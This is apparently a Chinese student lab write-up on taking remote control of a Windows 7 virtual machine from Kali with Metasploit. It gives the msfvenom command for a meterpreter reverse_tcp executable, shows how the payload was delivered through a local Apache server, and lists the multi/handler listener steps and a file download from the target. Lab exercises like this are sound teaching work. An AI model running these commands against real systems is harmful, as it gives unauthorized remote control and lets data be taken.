远程控制】 Metasploit应用"/>
【简单远程控制】 Metasploit应用
文章目录
- 一、实验环境
- 二、实验内容
- 1、生成主控端、被控端。
- 2、获得靶机(Windows)控制权。
- 3、下载靶机上任意一个文件。
- 三、实验步骤
一、实验环境
kali虚拟机,靶机win7,(都为NAT模式)
二、实验内容
1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。
三、实验步骤
(1)在kali生成被控端
打开kali终端输入命令,在本地生成攻击荷载
命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.47.128 lport=5000 -f exe -o /root/payload.exe
生成完毕,在将该荷载放到目标靶机上,此时kali就是主控端,靶机是被控端。
PS:在把荷载复制到目标靶机上的时候,可以先把它移动到主机,在从主机移动到靶机;也可以在kali搭建一个网站,将下载链接挂上去,再用靶机去访问这个网站,从而下载下来。(记录一下第二个方法的步骤)
①先在终端查看荷载的存放位置,输入命令ls;
②将荷载的目录地址复制过来,挂到网页上,文件名是 1.exe
命令:cd ./payload/var/www/html/1.exe
③输入命令:
service apache2 start
service apache2 status
cd /var/www/html
ls
④在kali的浏览器里输入环回地址:127.0.0.1/1.exe
⑤最后去靶机的浏览器输入命令:192.168.47.128/1.exe 即可下载
(2)获得靶机(Windows)的控制权
1.打开kali终端,输入msfconsole命令即可打开Metasploit
2.使用攻击模块
输入命令:
use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.47.128set lport 5000exploit
3.然后打开靶机,多次点击攻击荷载,此时kali已经开始监听靶机的行为,我们从网上下载一张图片,下载了以后,在kali也会出现靶机所下载的内容
(3)下载靶机上的任一文件
1.我们直接下载刚刚靶机下载的那种图片即可,输入download命令
2.最后打开kali的文件夹,输入下载的图片的存放目录/home/,找到了靶机下载的那张图片,我们已经将他下载下来,复现完毕!
更多推荐
【简单远程控制】 Metasploit应用
发布评论